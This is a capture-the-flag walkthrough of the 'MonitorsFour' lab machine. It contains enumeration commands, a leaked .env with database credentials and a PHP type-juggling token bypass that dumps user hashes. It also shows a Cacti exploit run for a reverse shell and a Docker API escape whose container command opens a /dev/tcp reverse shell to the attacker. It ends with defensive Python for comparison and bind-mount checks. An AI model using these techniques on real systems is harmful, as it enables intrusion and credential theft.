MonitorsFour

Enumeration

  • Add to /etc/hosts
10.129.52.128 monitorsfour.htb

nmap

nmap -sC -sV -T4 10.129.46.152 #1st Result
sudo nmap -A -sU --top-port 100 10.129.46.152 #No Results
nmap -p- -A 10.129.46.152 #2nd Result

80/tcp open  http    nginx
|_http-title: MonitorsFour - Networking Solutions
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP (80)

Directory Scan

ffuf -u http://monitorsfour.htb/FUZZ -w /opt/useful/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fc 403,404

contact           [Status: 200, Size: 367, Words: 34, Lines: 5, Duration: 3381ms]
login         [Status: 200, Size: 4340, Words: 1342, Lines: 96, Duration: 3385ms]
user                [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 3698ms]
static               [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 42ms]
views                [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 35ms]
controllers          [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 92ms]
forgot-password [Status: 200, Size: 3099, Words: 164, Lines: 84, Duration: 117ms]
.env                  [Status: 200, Size: 97, Words: 1, Lines: 6, Duration: 39ms]

Checking .env - Credentials for MariaDB

└──╼ $cat Untitled.env 
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r

Vhost Scan - Found Cacti

ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://10.129.46.152 -H 'Host: FUZZ.monitorsfour.htb' -fs 138

cacti                 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 664ms]
  • Add to /etc/hosts
10.129.52.128 monitorsfour.htb cacti.monitorsfour.htb

Banner - No Results

┌─[parrot@parrot]─[/opt/useful/seclists/Discovery/DNS]
└──╼ $curl -i monitorsfour.htb
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Dec 2025 20:05:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.3.27
Set-Cookie: PHPSESSID=d0cc4ea1e420066ec00fdf574e37fdfb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
  • Checking PHP/8.3.27
  • PHP version vulnerable to Type Juggling

Nikto - No Results

nikto -h monitorsfour.htb

The X-Content-Type-Options header is not set.
The anti-clickjacking X-Frame-Options header is not present.
Cookie PHPSESSID created without the httponly flag.

PHP Type Juggling

  • Trying Curl with Token Set
curl http://monitorsfour.htb/user?token=FFFF

{"error":"Invalid or missing token"}
  • Provides a different response, could be targeted by Magic Hashes
└──╼ $curl http://monitorsfour.htb/user?token=0
[{"id":2,"username":"admin","email":"admin@monitorsfour.htb","password":"56b32eb43e6f15395f6c46c1c9e1cd36","role":"super user","token":"8024b78f83f102da4f","name":"Marcus Higgins","position":"System Administrator","dob":"1978-04-26","start_date":"2021-01-12","salary":"320800.00"},{"id":5,"username":"mwatson","email":"mwatson@monitorsfour.htb","password":"69196959c16b26ef00b77d82cf6eb169","role":"user","token":"0e543210987654321","name":"Michael Watson","position":"Website Administrator","dob":"1985-02-15","start_date":"2021-05-11","salary":"75000.00"},{"id":6,"username":"janderson","email":"janderson@monitorsfour.htb","password":"2a22dcf99190c322d974c8df5ba3256b","role":"user","token":"0e999999999999999","name":"Jennifer Anderson","position":"Network Engineer","dob":"1990-07-16","start_date":"2021-06-20","salary":"68000.00"},{"id":7,"username":"dthompson","email":"dthompson@monitorsfour.htb","password":"8d4a7e7fd08555133e056d9aacb1e519","role":"user","token":"0e111111111111111","name":"David Thompson","position":"Database Manager","dob":"1982-11-23","start_date":"2022-09-15","salary":"83000.00"}]
  • Find Admin Credentials

admin:56b32eb43e6f15395f6c46c1c9e1cd36

56b32eb43e6f15395f6c46c1c9e1cd36    md5    wonderful1

Finding Magic Hashes

# Test with "magic" values that equal 0 in loose comparison
magic_values=("0" "0e0" "0e1" "0e12345" "00" "0x0" "0.0" "0 " " 0")
for value in "${magic_values[@]}"; do
	echo -n "Testing token=$value -> "
	curl -s "http://monitorsfour.htb/user?token=$value" | jq -r '.error // "SUCCESS!"'
done


Testing token=0 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing token=0e0 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing token=0e1 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing token=0e12345 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing token=00 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing token=0x0 -> Invalid or missing token
Testing token=0.0 -> jq: error (at <stdin>:0): Cannot index array with string "error"
# Also try common "magic hashes"
# MD5 hashes that start with "0e" and contain only digits after
magic_hashes=(
"0e215962017"
"0e462097431906509019562988736854"
"0e1137126905"
"0e291242476940776845150308577824"
"0e656258624"
)
for hash in "${magic_hashes[@]}"; do
echo -n "Testing MD5 magic hash: $hash -> "
curl -s "http://monitorsfour.htb/user?token=$hash" | jq -r '.error // "SUCCESS!"'
done

Testing MD5 magic hash: 0e215962017 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing MD5 magic hash: 0e462097431906509019562988736854 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing MD5 magic hash: 0e1137126905 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing MD5 magic hash: 0e291242476940776845150308577824 -> jq: error (at <stdin>:0): Cannot index array with string "error"
Testing MD5 magic hash: 0e656258624 -> jq: error (at <stdin>:0): Cannot index array with string "error"
# Test the tokens that gave jq errors - they might be valid!
tokens=("0" "0e0" "0e1" "0e12345" "00" "0.0")
for token in "${tokens[@]}"; do
echo "=== Testing token: $token ==="
curl -s "http://monitorsfour.htb/user?token=$token"
echo -e "\n"
done
=== Testing token: 0 ===
[{"id":2,"username":"admin","email":"admin@monitorsfour.htb","password":"56b32eb43e6f15395f6c46c1c9e1cd36","role":"super user","token":"8024b78f83f102da4f","name":"Marcus Higgins","position":"System Administrator","dob":"1978-04-26","start_date":"2021-01-12","salary":"320800.00"},{"id":5,"username":"mwatson","email":"mwatson@monitorsfour.htb","password":"69196959c16b26ef00b77d82cf6eb169","role":"user","token":"0e543210987654321","name":"Michael Watson","position":"Website Administrator","dob":"1985-02-15","start_date":"2021-05-11","salary":"75000.00"},{"id":6,"username":"janderson","email":"janderson@monitorsfour.htb","password":"2a22dcf99190c322d974c8df5ba3256b","role":"user","token":"0e999999999999999","name":"Jennifer Anderson","position":"Network Engineer","dob":"1990-07-16","start_date":"2021-06-20","salary":"68000.00"},{"id":7,"username":"dthompson","email":"dthompson@monitorsfour.htb","password":"8d4a7e7fd08555133e056d9aacb1e519","role":"user","token":"0e111111111111111","name":"David Thompson","position":"Database Manager","dob":"1982-11-23","start_date":"2022-09-15","salary":"83000.00"}]
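
Why 0, 0e0, 00 and 0.0 are accepted while 0x0 and FFFF are rejected, as an added example (not the target application's code, which is not shown on this page): a simplified Python model of PHP 8's == on two strings, run against the token values from the response above, next to a strict comparison. It assumes the server compares the supplied token to the stored tokens with ==.

```python
import hmac
import re

# PHP 8 "numeric string": optional surrounding whitespace, sign, integer or
# decimal part, optional exponent. "0x0" and "FFFF" do not match this.
_NUMERIC = re.compile(
    r"[ \t\n\r\v\f]*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?[ \t\n\r\v\f]*"
)

def php_loose_eq(a, b):
    """Simplified model of PHP 8 `$a == $b` when both operands are strings."""
    if _NUMERIC.fullmatch(a) and _NUMERIC.fullmatch(b):
        return float(a) == float(b)   # two numeric strings are compared as numbers
    return a == b                     # otherwise a plain string comparison

def strict_eq(a, b):
    """Byte-for-byte, constant-time comparison (the role hash_equals() has in PHP)."""
    return hmac.compare_digest(a.encode(), b.encode())

# Token values exactly as they appear in the /user response on this page.
STORED_TOKENS = {
    "admin": "8024b78f83f102da4f",
    "mwatson": "0e543210987654321",
    "janderson": "0e999999999999999",
    "dthompson": "0e111111111111111",
}

def matching_users(supplied, compare):
    """Users whose stored token is considered equal to the supplied one."""
    return [u for u, t in STORED_TOKENS.items() if compare(supplied, t)]

def numeric_looking_tokens():
    """Stored tokens PHP treats as numbers; every '0e<digits>' value equals 0."""
    return [u for u, t in STORED_TOKENS.items() if _NUMERIC.fullmatch(t)]

if __name__ == "__main__":
    for supplied in ["FFFF", "0", "0e0", "00", "0.0", "0x0"]:
        print(f"{supplied!r:7} loose={matching_users(supplied, php_loose_eq)} "
              f"strict={matching_users(supplied, strict_eq)}")
    print("numeric-looking stored tokens:", numeric_looking_tokens())
```

On the PHP side the equivalent of strict_eq is hash_equals() or ===, and tokens should be generated so they can never be all-numeric strings.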

Logging into monitorsfour.htb

  • Find details regarding admin User
admin Marcus Higgins
  • Trying credentials on Cacti

Enumerating Cacti - cacti.monitorsfour.htb

  • Version 1.2.28 | (c) 2004-2025 - The Cacti Group
  • Logging in using Marcus:wonderful1
python3 exploit.py -u Marcus -p wonderful1 -url http://cacti.monitorsfour.htb -i 10.10.14.128 -l 4444
nc -nvlp 4444

Flag 1 - User Flag

www-data@821fbd6a43fa:/home/marcus$ cat user.txt
cat user.txt
8ef8cf7d32bdd83b73be54eb9fd85812

Flag 2 - Root Flag

www-data@821fbd6a43fa:/home/marcus$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host proto kernel_lo 
       valid_lft forever preferred_lft forever
2: eth0@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether d6:17:cb:84:7b:36 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.18.0.3/16 brd 172.18.255.255 scope global eth0
       valid_lft forever preferred_lft forever
www-data@821fbd6a43fa:/home/marcus$ ip route
ip route
default via 172.18.0.1 dev eth0 
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.3 
  • Indicates it is a Docker Container
    • 172.18.0.0/16 is a common Docker bridge network
    • The @if7 suffix means this interface is veth-paired to another interface
    • 821fbd6a43fa looks exactly like a Docker container ID (12-char hex)
  • Therefore the goal is a Docker Escape

www-data@821fbd6a43fa:/home/marcus$ uname -a
uname -a
Linux 821fbd6a43fa 6.6.87.2-microsoft-standard-WSL2 
#1 SMP PREEMPT_DYNAMIC Thu Jun  5 18:30:46 UTC 2025 x86_64 GNU/Linux
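  • Creating a new Docker container through the Docker Engine API at 192.168.65.7:2375, with the host path /mnt/host/c bind-mounted at /host_root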
cat > create_container.json <<EOF
{
"Image": "docker_setup-nginx-php:latest",
"Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.14.128/5555 0>&1"],
"HostConfig": {
"Binds": ["/mnt/host/c:/host_root"]
}
}
EOF
nc -nvlp 5555
curl -H 'Content-Type: application/json' -d @create_container.json "http://192.168.65.7:2375/containers/create" -o response.json
cat response.json
{"Id":"e3bb31b590f4e03157184c1d9bad2e40d52fe3a668ccd829356e2be7afa5f4f0","Warnings":[]}


curl -X POST "http://192.168.65.7:2375/containers/e3bb31b590f4e03157184c1d9bad2e40d52fe3a668ccd829356e2be7afa5f4f0/start"
root@e3bb31b590f4:/host_root/Users/Administrator/Desktop# cat root.txt
cat root.txt
755aa27aee46e147667b7a2de0d610d6
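
A defender-side check for the container-create request used above, as an added example (not part of the original notes): a Python policy function of the kind an API proxy or authorization plugin in front of the Docker Engine API could apply to POST /containers/create bodies. The deny list and function names are assumptions, and the first fix remains not exposing port 2375 without TLS client authentication.

```python
import json

# Assumed policy: host paths a container must never be allowed to bind-mount.
DENIED_PREFIXES = ("/mnt/host", "/etc", "/proc", "/sys", "/root",
                   "/var/run/docker.sock")

def bind_sources(host_config):
    """Host-side paths from both bind syntaxes of the create API (Linux-style paths)."""
    sources = [b.split(":", 1)[0]
               for b in host_config.get("Binds") or [] if ":" in b]
    sources += [m.get("Source", "")
                for m in host_config.get("Mounts") or [] if m.get("Type") == "bind"]
    return sources

def is_denied(path):
    path = path.rstrip("/") or "/"     # "/" means the whole host filesystem
    return path == "/" or any(
        path == p or path.startswith(p + "/") for p in DENIED_PREFIXES)

def review_create_request(body):
    """Return the list of policy findings for one create-container JSON body."""
    host_config = json.loads(body).get("HostConfig") or {}
    findings = ["bind mount of host path " + s
                for s in bind_sources(host_config) if is_denied(s)]
    if host_config.get("Privileged"):
        findings.append("privileged container requested")
    if host_config.get("PidMode") == "host":
        findings.append("host PID namespace requested")
    return findings

# HostConfig as sent on this page (Cmd omitted; it is not inspected here).
PAGE_REQUEST = json.dumps({
    "Image": "docker_setup-nginx-php:latest",
    "HostConfig": {"Binds": ["/mnt/host/c:/host_root"]},
})
# Constructed benign request: a named volume, no host path involved.
BENIGN_REQUEST = json.dumps({
    "Image": "nginx:latest",
    "HostConfig": {"Binds": ["webdata:/usr/share/nginx/html"]},
})

if __name__ == "__main__":
    print(review_create_request(PAGE_REQUEST))
    print(review_create_request(BENIGN_REQUEST))
```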